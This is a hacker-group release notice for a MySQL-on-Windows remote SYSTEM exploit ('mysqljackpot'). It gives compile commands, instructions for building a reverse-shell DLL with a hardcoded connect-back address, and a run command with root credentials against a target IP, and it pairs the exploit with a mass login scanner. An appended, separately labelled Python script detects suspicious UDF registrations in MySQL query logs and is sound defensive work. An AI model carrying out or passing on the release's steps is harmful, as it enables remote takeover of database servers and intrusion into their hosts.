MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)


SUBMITTED BY: Guest

DATE: Nov. 25, 2013, 9:04 p.m.


***
FARLiGHT ELiTE HACKERS LEGACY R3L3ASE
***

Attached is the MySQL Windows Remote Exploit (post-auth, udf
technique) including the previously released mass scanner.
The exploit is mirrored at the farlight website http://www.farlight.org.

Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday
All owned By Kingcope

http://www.exploit-db.com/sploits/23073.tar.gz

Installation Instructions
=============================

1. Install mysql client libraries and headers (UNIX)
RedHat based (e.g. CentOS):
yum install mysql mysql-devel

2. Compile the standalone exploit
issue commands:
gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient

3. Compile the reverse shell payload (this is required!)
required because the connect back ip and port are hardcoded in the dll:
use mingw on windows or wine
change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have
to change the port in mysqljackpot.c too (default port: 443).
issue commands:
set PATH=%PATH%;c:\MinGW\bin\
gcc -c payload.c
gcc -shared -o payload.dll payload.o -lws2_32
copy the payload.dll into the mysqljackpot exploit folder

4. Run The Exploit
./mysqljackpot -u root -p "" -t 99.99.99.99

A valid database admin user and his password are required
for the exploit to work properly.
This exploit is especially useful when used in connection
to a MySQL login scanner, see scanner/README.mysql inside this package.
Be sure to have the firewall open on the desired reverse port
on the attacking machine.

5. Enjoy your SYSTEM Shell!!!

Yours Sincerely,
-- Kingcope
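
Added example for defenders, not part of the original release or its author's code: the README describes a post-auth UDF technique, and registering a UDF goes through MySQL's CREATE FUNCTION ... SONAME statement, so this script scans general query log lines for registrations whose library is not on an allow-list and attributes each one to the connecting account. The log layout is a simplified assumption, and ALLOWED_LIBS, the function names and the sample lines are constructed for illustration.

```python
import re

# Assumed, simplified general query log layout:
#   [YYMMDD HH:MM:SS] <thread-id> <Command> <argument>
LINE_RE = re.compile(
    r"^(?:\d{6}\s+[\d:]+)?\s*(?P<tid>\d+)\s+(?P<cmd>Connect|Query|Quit)\s*(?P<arg>.*)$")
# Documented UDF registration statement: CREATE FUNCTION ... SONAME '<library>'
UDF_RE = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+`?(?P<name>\w+)`?\s+RETURNS\s+\w+"
    r"\s+SONAME\s+['\"](?P<lib>[^'\"]+)['\"]", re.IGNORECASE)

ALLOWED_LIBS = {"approved_udf.dll"}  # hypothetical site allow-list

def find_udf_registrations(lines, allowed_libs=ALLOWED_LIBS):
    """Return one finding per CREATE FUNCTION ... SONAME with an unapproved library."""
    sessions, findings = {}, []
    for raw in lines:
        m = LINE_RE.match(raw.rstrip("\r\n"))
        if not m:
            continue  # continuation lines of multi-line statements are skipped
        tid, cmd, arg = m.group("tid"), m.group("cmd"), m.group("arg")
        if cmd == "Connect":
            # Argument looks like "user@host on database"
            user, _, rest = arg.partition("@")
            sessions[tid] = (user, rest.split(" ", 1)[0])
        elif cmd == "Quit":
            sessions.pop(tid, None)
        else:
            udf = UDF_RE.search(arg)
            if udf and udf.group("lib").lower() not in allowed_libs:
                user, host = sessions.get(tid, ("unknown", "unknown"))
                findings.append({"thread": tid, "user": user, "host": host,
                                 "function": udf.group("name"),
                                 "library": udf.group("lib")})
    return findings

# Constructed sample lines (not taken from a real server)
SAMPLE_LOG = [
    "131125 21:04:01\t    7 Connect\troot@203.0.113.7 on ",
    "\t\t    7 Query\tselect @@version_compile_os",
    "\t\t    7 Query\tCREATE FUNCTION demo_fn RETURNS STRING SONAME 'unknown_lib.dll'",
    "\t\t    7 Quit\t",
    "131125 21:10:12\t    8 Connect\tdba@localhost on inventory",
    "\t\t    8 Query\tCREATE FUNCTION approved_fn RETURNS INTEGER SONAME 'approved_udf.dll'",
]

if __name__ == "__main__":
    for f in find_udf_registrations(SAMPLE_LOG):
        print("UDF {function} from {library} registered by {user}@{host}".format(**f))
```

The general query log is off by default, so this check only sees servers where it has been enabled; the same allow-list comparison can be applied to the rows of the mysql.func table.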
